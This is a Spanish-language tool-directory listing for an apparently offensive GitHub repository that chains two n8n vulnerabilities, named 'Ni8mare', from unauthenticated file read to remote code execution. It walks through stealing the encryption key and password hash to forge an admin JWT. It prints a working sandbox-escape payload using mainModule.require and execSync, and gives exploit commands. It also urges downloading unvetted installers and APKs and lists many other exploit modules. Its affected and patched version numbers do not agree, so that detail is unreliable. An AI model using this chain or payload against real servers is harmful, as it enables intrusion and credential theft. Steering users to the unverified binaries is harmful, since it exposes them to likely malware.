Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-21858-n8n-FullChain — 🛡️ Módulo oficial de herramienta de seguridad con IA para CVE-2026-21858 + CVE-2025-68613 (n8n "Ni8mare" lectura arbitraria de archivos no autenticada e inyección de expresiones RCE cadena completa). | Kitploit
Herramientas/GitHubGitHub/zerodayevil/cve-2026-21858-n8n-fullchain
Escáneres de VulnerabilidadesAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPost-ExplotaciónSeguridad WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
Seguridad de IA
GitHubzerodayevil/cve-2026-21858-n8n-fullchain

CVE-2026-21858-n8n-FullChain

🛡️ Módulo oficial de herramienta de seguridad con IA para CVE-2026-21858 + CVE-2025-68613 (n8n "Ni8mare" lectura arbitraria de archivos no autenticada e inyección de expresiones RCE cadena completa).

Ver Repositorio
hace 14h 10mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🛡️ Módulo de Herramienta de Seguridad de IA
Cadena Completa de n8n (CVE-2026-21858 + CVE-2025-68613) — "Ni8mare"

Módulo Oficial de Auditoría de Seguridad para el Ecosistema de Herramientas de Seguridad de IA


Latest Release Build Status Donations Telegram Channel

License

🌐 Demostración Web • 📚 Sitio Web del Proyecto • 💬 Chat de la Comunidad

Navegación del Sitio Web: Inicio • Actualizaciones • Descargas • Módulos

AI Security Tool Banner


🧠 Descripción Conceptual

Este módulo proporciona herramientas de diagnóstico y una cadena de explotación completa para instancias de automatización de flujos de trabajo n8n, denominada Ni8mare.

La cadena de ataque combina una Lectura Arbitraria de Archivos no autenticada (CVE-2026-21858) causada por confusión de Content-Type con un Bypass del Sandbox de Inyección de Expresiones autenticado (CVE-2025-68613). Al enviar una solicitud manipulada con Content-Type: application/json a un formulario de carga de archivos expuesto, un atacante controla el argumento filepath para leer archivos internos del sistema (/proc/self/environ, configuración y base de datos SQLite). La encryptionKey y el hash de contraseña obtenidos permiten la falsificación offline de una cookie JWT de administrador. Una vez autenticado, la inyección de expresiones mediante this.process.mainModule.require escapa del sandbox de JavaScript para ejecutar comandos arbitrarios del sistema.

🎯 Filosofía del Impacto Principal

"De la lectura de archivos a la toma de control total del sistema en tres pasos."
Mientras que la lectura de archivos requiere un flujo de trabajo de formulario activo con salida binaria, la inyección de expresiones funciona de manera confiable en instalaciones predeterminadas de n8n sin requerir nodos especiales ni permisos explícitos del sistema habilitados.

📊 Especificaciones de la Vulnerabilidad

EspecificaciónValor AsignadoNotas
Identificadores CVECVE-2026-21858 + CVE-2025-68613Cadena Completa: Lectura de Archivos no Autenticada a RCE
Clasificación de SeveridadCrítica (CVSS v3.1: 10.0 + 9.9)Cadena RCE no autenticada
Tipos de VulnerabilidadCWE-200 / CWE-94Confusión de Content-Type / Inyección de Código
Componente AfectadoMotor de Automatización de Flujos de Trabajo n8nVersiones <= 1.65.0 (AFR) / >= 0.211.0 (RCE)
Versiones Parcheadas1.121.0 (AFR) / 1.120.4+ (RCE)Parches oficiales del proveedor publicados
Privilegios RequeridosNingunoAcceso inicial no autenticado mediante formulario público

🕸 Escenario de Ataque y Arquitectura

root@kitploit:~
graph TD
    A[Unauthenticated Attacker] -->|1. Content-Type Confusion| B[Vulnerable Form Endpoint]
    B -->|2. Arbitrary File Read| C[Extract /proc/self/environ & database.sqlite]
    C -->|3. Derive Secret & Hash| D[Forge Admin JWT Cookie]
    D -->|4. Authenticate as Admin| E[n8n Workflow Engine]
    E -->|5. Expression Injection Payload| F[Sandbox Escape via mainModule.require]
    F -->|6. Execute Command| G[Full Remote Code Execution]

💻 Payload de Inyección de Expresiones

root@kitploit:~
={{ (function() {
  var require = this.process.mainModule.require;
  var execSync = require("child_process").execSync;
  return execSync("id").toString();
})() }}

🛡 Lista de Verificación de Mitigación

  • 🟢 Actualizar Inmediatamente: Actualice las instancias de n8n a la versión 1.121.0 o superior.
  • 🟢 Restringir Disparadores de Flujos de Trabajo: Deshabilite los flujos de trabajo de formularios públicos no autenticados o aplique una validación estricta de archivos.
  • 🟡 Configurar Restricciones de Ejecución: Establezca N8N_ENFORCE_SETTINGS_FILE_PERMISSIONS=true y restrinja las capacidades del proceso en contenedores Docker.

💻 Cómo Ejecutar este Módulo

⚠️ IMPORTANTE: Este módulo está diseñado específicamente para la ejecución segura y el diagnóstico dentro del ecosistema de AI Security Tool. Utilice siempre módulos verificados provenientes de repositorios oficiales.

1️⃣ Instalar AI Security Tool

Para ejecutar los scripts de monitoreo y diagnóstico, asegúrese de que el motor principal de AI Security Tool esté instalado:

SO / PlataformaVersiónArquitectura / FormatoFecha de LanzamientoEstadoEnlace de Descarga
🪟 Windowsv6.3.20Instalador x64 (.exe)2026-09-08🟢 ÚltimaDescargar .exe
🪟 Windowsv6.3.20Portable x64 (.tar.gz)2026-09-08🟢 ÚltimaDescargar .tar.gz
🍏 macOSv5.3.29Apple Silicon M1/M2/M3 (.dmg)2026-09-05🟢 EstableDescargar .dmg
🐧 Linuxv5.3.27Universal x64 (.tar.gz)2026-09-01🟢 EstableDescargar .tar.gz
🤖 Androidv8a 5.3.27ARM64 APK (.apk)2026-09-01🟢 EstableDescargar .apk

2️⃣ Ejecución en Consola

root@kitploit:~
# Read arbitrary file via diagnostic module
uv run python exploit.py http://localhost:5678 /form/vulnerable-form --read /etc/passwd

Execute full attack chain with custom command

uv run python exploit.py http://localhost:5678 /form/vulnerable-form --cmd "id"


🔍 Módulos de Auditoría de Seguridad y Repositorios PoC

Módulos de escaneo de vulnerabilidades, scripts PoC y repositorios de investigación mantenidos por nuestra comunidad:

🔥 Ejecución Remota de Código (RCE) y Vulnerabilidades de Red 5 módulos
  • CVE-2026-21858 — Cadena Completa de RCE no Autenticada en n8n (Ni8mare) @ZeroDayEvil
  • CVE-2026-41089 — Exploit de Ejecución Remota de Código en Netlogon @ZeroDayEvil
  • CVE-2026-20805 — Prueba de Concepto de Ejecución Remota de Código en Windows @ZeroDayEvil
  • CVE-2026-41096 — Módulo Escáner de Vulnerabilidad RCE Crítica @ZeroDayEvil
  • CVE-2026-24291 — Ejecución Remota de Código en Protocolo de Red @ZeroDayVPN
🛡️ Escalada de Privilegios (EoP) y Servicios 3 módulos
  • CVE-2026-54121 — Suplantación de Controlador de Dominio AD CS Certighost @ZeroDayEvil
  • CVE-2026-66804 — Escalada de Privilegios en el Servicio CrossDevice @ZeroDayVPN
  • CVE-2026-50416 — Análisis y PoC de Escalada de Privilegios Local @ZeroDayEvil
📚 Investigación de Vulnerabilidades y Análisis 2 módulos
  • CVE-2026-42978 — Análisis Técnico Profundo e Investigación PoC @ZeroDayEvil
  • CVE-2026-83991 — Análisis Completo y Demostración de Explotación @ZeroDayVPN

⚖️ Licencia y Aviso Legal

🚨 Aviso Legal

Esta herramienta y análisis técnico se proporcionan estrictamente para auditoría de sistemas autorizada, investigación y pruebas de penetración.
Ejecutar cadenas de explotación contra objetivos no autorizados es ilegal. Los autores no asumen ninguna responsabilidad por acceso no autorizado, pérdida de datos o interrupciones del sistema. Opere estrictamente dentro de un alcance autorizado.

🔄 Contribución y Comunidad

¡Damos la bienvenida a las contribuciones de la comunidad de investigación de seguridad! Áreas principales de contribución:

  1. Integraciones de IA: Agregar nuevos proveedores de LLM y desarrollar agentes de seguridad especializados.
  2. Herramientas de Seguridad: Desarrollar módulos de vulnerabilidad e integrar escáneres CLI.
  3. Optimización: Mejorar la velocidad del analizador, la seguridad de ejecución y la lógica de caché.
  4. Documentación: Escribir artículos de investigación, guías y traducciones localizadas.

🔗 Contacto y Soporte

  • Sitio Web Oficial: ZeroDayEvil.com
  • Investigación Original: Análisis de Cyera Ni8mare
  • Administrador de Telegram: @ZeroDayEvil
  • Chat de Telegram: @ZeroDyaTool_chat
  • Canal de Telegram: @ZeroDyaTool_channel
  • Patrocinar Proyecto: Donaciones por PayPal
  • Open Collective: opencollective.com/ZeroDayEvil

AI Security Tool — Reimaginando el flujo de trabajo de terminal y la automatización para profesionales de ciberseguridad.

Descargar herramienta